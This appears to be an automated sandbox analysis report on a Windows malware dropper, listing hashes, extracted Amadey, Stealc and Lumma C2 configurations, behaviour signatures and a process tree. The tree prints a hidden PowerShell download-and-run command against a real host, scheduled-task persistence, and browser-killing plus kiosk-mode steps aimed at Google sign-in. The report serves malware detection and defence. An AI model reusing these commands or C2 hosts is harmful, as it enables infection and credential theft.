Analysis

  • max time kernel
    110s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 13:49

General

  • Target

    2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    0be1d68cb52990f41a783f9b0aba5fc8

  • SHA1

    7823839d432aad2877d8c2ef4f664b209cbc71ba

  • SHA256

    a5b959ac59961099a0605032aad6ad96ed577cfe8283bab41acc1efc8a00a1e4

  • SHA512

    5347dafacf19ef7437ad2730ecf7ab522b870779989e686d91e918ec3424cf35739e7ee32dca09d86894b3c783195c0c72e12ed70e6099f698efdfbbca8e71e4

  • SSDEEP

    24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8a41u:mTvC/MTQYxsWR7a41

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

lumma

C2

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 3 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn ySgTlmaKy2s /tr "mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn ySgTlmaKy2s /tr "mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2352
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2936
        • C:\Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
          "C:\Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2944
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1532
            • C:\Users\Admin\AppData\Local\Temp\10381670101\3eb6a201c4.exe
              "C:\Users\Admin\AppData\Local\Temp\10381670101\3eb6a201c4.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2216
            • C:\Users\Admin\AppData\Local\Temp\10381680101\8833e2c5da.exe
              "C:\Users\Admin\AppData\Local\Temp\10381680101\8833e2c5da.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2312
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1148
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:612
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:596
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2300
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:300
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2212
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  8⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1504
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.0.1543103055\488885684" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02658747-8900-4dac-93e9-cf54ab49ea9b} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 1296 121f3858 gpu
                    9⤵
                      PID:2404
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.1.2087288356\1981939181" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {722d030a-66b9-4808-b954-f2787ec2acfe} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 1504 d71b58 socket
                      9⤵
                        PID:2760
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.2.87329680\1332672079" -childID 1 -isForBrowser -prefsHandle 1792 -prefMapHandle 1800 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed3cd48c-b326-4ae7-8dff-f5a776d3aae7} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 1772 1a4ae358 tab
                        9⤵
                          PID:2676
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.3.1936006475\1157040684" -childID 2 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bbdd7d33-086d-4c30-a1ab-ee020a6e0baa} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 2928 d62758 tab
                          9⤵
                            PID:952
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.4.1761648579\1017233117" -childID 3 -isForBrowser -prefsHandle 3652 -prefMapHandle 3648 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6940b65-7212-4734-a376-81b1733c4e0a} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 3664 1a683158 tab
                            9⤵
                              PID:2852
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.5.53251615\1003073296" -childID 4 -isForBrowser -prefsHandle 3768 -prefMapHandle 3772 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d4dba85-d134-42f0-96c1-8cc14649cce4} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 3756 1a682e58 tab
                              9⤵
                                PID:1892
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.6.672532396\1251112746" -childID 5 -isForBrowser -prefsHandle 3808 -prefMapHandle 3804 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {77f688a4-772b-4eb7-942d-8b40483e0a8b} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 3828 1a684958 tab
                                9⤵
                                  PID:1040
                          • C:\Users\Admin\AppData\Local\Temp\10381690101\7a9f3697b2.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381690101\7a9f3697b2.exe"
                            6⤵
                            • Modifies Windows Defender DisableAntiSpyware settings
                            • Modifies Windows Defender Real-time Protection settings
                            • Modifies Windows Defender TamperProtection settings
                            • Modifies Windows Defender notification settings
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Windows security modification
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1592
                          • C:\Users\Admin\AppData\Local\Temp\10381700101\76de0e6834.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381700101\76de0e6834.exe"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3184
                          • C:\Users\Admin\AppData\Local\Temp\10381710101\21c94957e7.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381710101\21c94957e7.exe"
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3452
                          • C:\Users\Admin\AppData\Local\Temp\10381720101\ec2d8d45c3.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381720101\ec2d8d45c3.exe"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Loads dropped DLL
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3652
                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381720101\ec2d8d45c3.exe"
                              7⤵
                              • Downloads MZ/PE file
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3820
                          • C:\Users\Admin\AppData\Local\Temp\10381730101\00c0c811d7.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381730101\00c0c811d7.exe"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Loads dropped DLL
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3172
                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381730101\00c0c811d7.exe"
                              7⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2036

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EB0KZ1Y4\soft[1]

                  Filesize

                  1.8MB

                  MD5

                  0ed490bfd267269adab9e7c3db3a2ccd

                  SHA1

                  bd5111ca25300c8bbd853fe664c0dd76b5d0dc66

                  SHA256

                  5505795c806570f310ff901a733036df277ae7c8a5262e2fa3b8cc8be57ae48c

                  SHA512

                  dc40e223d2f8b3f6de2a6e78e2d2b0bf3d60d2c880cb58b988ee1b490c4c1419ca633f96d354ca75789cc252dd6d64ef88be89f616ae472395ecb36bb356a03e

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\service[1].htm

                  Filesize

                  1B

                  MD5

                  cfcd208495d565ef66e7dff9f98764da

                  SHA1

                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                  SHA256

                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                  SHA512

                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\activity-stream.discovery_stream.json.tmp

                  Filesize

                  23KB

                  MD5

                  25f9eafeeb1b63c94d418b4132f37ae4

                  SHA1

                  d007705ea41f15071dfddf33b6c83e991b200ea0

                  SHA256

                  531a69789587e535c95c02165528b27adf480ca0e81567b71e3f428bb0caeca1

                  SHA512

                  a740544f80f122d7c327a7790d875f728c2b68111f1e9731c0e03eb3a0ef56e17e766b6390e3e53914d01cb946a454f7a62f466a2e73feb8615bca53f1192cfe

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                  Filesize

                  15KB

                  MD5

                  96c542dec016d9ec1ecc4dddfcbaac66

                  SHA1

                  6199f7648bb744efa58acf7b96fee85d938389e4

                  SHA256

                  7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                  SHA512

                  cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                • C:\Users\Admin\AppData\Local\Temp\10381670101\3eb6a201c4.exe

                  Filesize

                  1.7MB

                  MD5

                  5dd55b0c5021bf7a1abd5dcff2598695

                  SHA1

                  d523df50545388ae0465ed4ef58e05c387b38d8d

                  SHA256

                  143fa09fc53e1bd7eb74d005c66f39a90b87901b69b6ea3209e4c33cf7b70f0c

                  SHA512

                  a36dd71d4b48a30f0ef92bbbe59d9f1accfe152b7fec9c4f1a3896485bed084963821b5e6cb975bdd69ad3b867ed9c497733583f2e04f0617ebb2d6daef8670b

                • C:\Users\Admin\AppData\Local\Temp\10381680101\8833e2c5da.exe

                  Filesize

                  950KB

                  MD5

                  abb7738b0d8041d72718a0358da1d866

                  SHA1

                  6f0a0aeccbab99ab5e06819e48c0a5761e42a1ab

                  SHA256

                  77b0911b9840fed6e2bb625e00e221adc5b5868198b4916303675154b4b81d5e

                  SHA512

                  69097dd3019455023f0b142d65ae68525b372e0960d0e9995340ef736461582e459608475b361cb47d97055cc7cbc88642b55f6966ec6461289f92a6406bc0c9

                • C:\Users\Admin\AppData\Local\Temp\10381690101\7a9f3697b2.exe

                  Filesize

                  1.7MB

                  MD5

                  c5531ef7f8f5936fbaef26e92eff6586

                  SHA1

                  b29d02e373485971da8fba4093d5b2ecc711b07c

                  SHA256

                  235dad4176b568a8137525842b7da13817e7685b83b9970839b1c67b8f732c1f

                  SHA512

                  dc00c684f0f4c5db6c2f3c73fb8906c596c6efa008149b9a8c9db08ec6fc07a9fb409d3d0fc70132032a3f2d58e127d897cdc8005e2da297b221da03b7d27a6f

                • C:\Users\Admin\AppData\Local\Temp\10381700101\76de0e6834.exe

                  Filesize

                  1.8MB

                  MD5

                  242617c7d9c922457ad4ea64cb40f6ea

                  SHA1

                  9725d4a1e476d9fb9d3e0b495fa4796b250470ba

                  SHA256

                  f7fa8ca1c918f76a3b9057bde8cee2ce5bb6dda1b069cbfc531c513ab6b060c2

                  SHA512

                  f122a19107afd8d4914bf5997ad64c26468b0a1b2db8802a47345acd7e60d925a41cc4a2fa934a752b021ba7b8cefa886c16ca728da01ce21942d6e91675a6ab

                • C:\Users\Admin\AppData\Local\Temp\10381710101\21c94957e7.exe

                  Filesize

                  320KB

                  MD5

                  12335af9a4620d3d3ee7739c602f5747

                  SHA1

                  8d25d6fcb88ca41bb33a566fd3d358c29014446b

                  SHA256

                  610cf4f6f84e7d6e3b227df0381114ffe74aa510496352dcecf54272bd147d18

                  SHA512

                  b941ea37c928ca64fb6d893e2ac2d258d96e097f96df690e2c0a25dcf65d4b9dedfb62da73ee916fe76918801a48e35df5e2ba2b968c95f170ef0ef5d986c01b

                • C:\Users\Admin\AppData\Local\Temp\10381710101\21c94957e7.exe

                  Filesize

                  240KB

                  MD5

                  fdd55ad9190ca9a56c0d400d65b7504f

                  SHA1

                  cd2e1d9636fa035ec3c739a478b9f92bf3b52727

                  SHA256

                  79c986fd9c87542256a607eff10f5a2f84165b08bd9dd161e2d33e213607b487

                  SHA512

                  bea47ea7099e6922ffa60442e3f7010fdffa86e37a020e2fc30502b42a76ad5fbfd9780af988742b398fb9487744d4095912183157aa89ae40f31492b76e95cb

                • C:\Users\Admin\AppData\Local\Temp\10381720101\ec2d8d45c3.exe

                  Filesize

                  4.5MB

                  MD5

                  f0a8d70133d24e01a0988f692ac1f18d

                  SHA1

                  28f7ff1ba6dcb47018a33f364303f8dcaf362a67

                  SHA256

                  8d490549fd996897d7333c1d9a6e6ce220432b147582f4e174f8cc427c338559

                  SHA512

                  54559c608af47cb2863493dfbe952cfde2d42a8a6ddab59836d3e1aa8c6d939b2851bddc6f5c9b5fca94e9ae24d986b928d7b3e08b86e630c1b520313c286889

                • C:\Users\Admin\AppData\Local\Temp\10381730101\00c0c811d7.exe

                  Filesize

                  4.3MB

                  MD5

                  4ea661c85a082117e59ea78f2f140a1c

                  SHA1

                  49940f31bc96b08d70c1ef56d010ea320f9bbb74

                  SHA256

                  389d6b90d016366fbe93940d9e4cc9594a5491c408cdc803766397012aee1a3a

                  SHA512

                  df3444c2a93ca62572d0f5640ece177973a3f9750952cc9d415d3dc03a0c14f66d3ce3d35f3c0ff44480809be8bf9218ae50cbddeeb4486e8850213a9330a394

                • C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta

                  Filesize

                  717B

                  MD5

                  de93fae868e76046cd5fdbd9f381c5bc

                  SHA1

                  b9ff5f7210a226dd42ac5c1eb756abbb479f62b8

                  SHA256

                  0d265f92a184868ec8ffef463bf16f5ee3a09fd27c36129e6f3196c330a1310e

                  SHA512

                  1e57c7886a0704b9a662ff2b8076ec93e99ee3ce05b0ee4a7d810b16c3a76dacc55573e6bb14206f4a7a72ae9c2c93b2a080347a9aa6a4a81667048673c6d58f

                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe

                  Filesize

                  2.9MB

                  MD5

                  b826dd92d78ea2526e465a34324ebeea

                  SHA1

                  bf8a0093acfd2eb93c102e1a5745fb080575372e

                  SHA256

                  7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

                  SHA512

                  1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\db\data.safe.bin

                  Filesize

                  2KB

                  MD5

                  f3b54aa7f32d78e7b49c44654d62825d

                  SHA1

                  3f8c618c9a1921c7e0be8d7c6ae60640ec1b0f63

                  SHA256

                  d117d2e684a93c1743f061d941054392e88dc0e34c9944e7863de36102e7d73e

                  SHA512

                  2a1f05b140cfceb76bc8935f77d3eeef0ad179b484441ab9308ae2e400f7a5f53fbfb4279b8381b74ced1987d33d8a2aa628e7152b534a6a01a9ad9fb86327d2

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\pending_pings\242baa5d-1093-44ba-9ed5-4598bb843613

                  Filesize

                  12KB

                  MD5

                  d5658afed2f2bfa238ea6daa58b39408

                  SHA1

                  b3f34066da07f914e0919f4dce3a45c1ead6e208

                  SHA256

                  0fda65e750f74f54df4a2cb84a4f4c5c53df95280e83488b9f6f8bfd3d57b338

                  SHA512

                  bbf67d89edead4fb540bc649898659e95b39e7dd2fd7cfc632ee58ba5dfd790fd24f0de97c998a0c3b503e7b773d79e685a9ffa7870fd24561adf9b2e54422d5

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\pending_pings\b7a3f615-67be-44ec-aa00-22bdb7b3b006

                  Filesize

                  745B

                  MD5

                  8d8b5a39169fae103f48e30421a3af02

                  SHA1

                  70fef005ffff2d9f52c31b28e646df5f337fc64e

                  SHA256

                  f880ffc290054fbd0b6d9cbc251c16ff60fe69b6e19757e3a2cdb23b610be10f

                  SHA512

                  07a6578c8f1217998e7cd42c6de63691511c3f484cfb8c33f263616e5c93cceea1be69060512c1ffc86e4e722faab8b9e1af30a7ea34ccaac8deb46fb661c106

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs-1.js

                  Filesize

                  6KB

                  MD5

                  499f99a0ce460365fe8f734df0ce49d5

                  SHA1

                  aecbecd51865bdb4a2eef4d520050c4eada6c5dd

                  SHA256

                  236dbfc9dd69ca66d181a0e8739838075e3be86f0f9abbef53dcd148644296b9

                  SHA512

                  e9adab6310e7f299c830e9ba33727da5d7591846a5325e752cf3c6edea7a03b8709bfd398c5d78e1ff6b56b82f482d1825cd7f6244a49b89ff1af9b9cdfe6264

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs.js

                  Filesize

                  6KB

                  MD5

                  ac3d7cf17f166bae84efb808ea9b13f9

                  SHA1

                  6121f914b9cc2d7ca42ec561c7941c73bd55e381

                  SHA256

                  97db6e975068faf2bb9f74c67f8dd8fb74ac1e1adee25c39cd143d73ca2b557f

                  SHA512

                  991f38948eee57dbc0b13f0da335fe46109d489533cfcf7dfece89964ac1e343ad69910d3db0d6193a7b5701a42b9c6b463089e425ca872300e45a1978672dd2

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs.js

                  Filesize

                  6KB

                  MD5

                  446165e788c0e0df54faf273b55e311b

                  SHA1

                  8e796a6b4fe22a741d51f47df0e1ce29f4dd085e

                  SHA256

                  780574c4dfc80388b97ce9acd1867873cfabf99e7b2d927ceda698b0c293ebc3

                  SHA512

                  1cbe28b7ae774c56548735754e180372e11f9ea4b4f189e6bce6c0fbd33d96e3d0a3df99a6332377f1f1771862b74ca98c2414a0c703d4fc740b600cf2f7b568

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\sessionstore-backups\recovery.jsonlz4

                  Filesize

                  4KB

                  MD5

                  9d81061f22595dddbe6659b52386f521

                  SHA1

                  383abf7ccc00b8640794774ac7a467b19d89a341

                  SHA256

                  b900aa29c4921a25b74b09812048ab657650fa459b53f02ca4a4f25e14e4d865

                  SHA512

                  883ba5cfc235ecc5022c9933daac703fa409f7ff0d9b35f495d1257b68e17d7e9f49b72803c7a3a4f87cd89b920066fdf91c3f2ebbf14df0acf5652470ccb916

                • \Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE

                  Filesize

                  1.8MB

                  MD5

                  89431b16b25281a50a173f359ecbcebf

                  SHA1

                  a5931bc59fd615f199461eb009262d26ff34c814

                  SHA256

                  78d33d02042213510b32b2c13599a33d000cc66fd295714300a557872cfc125e

                  SHA512

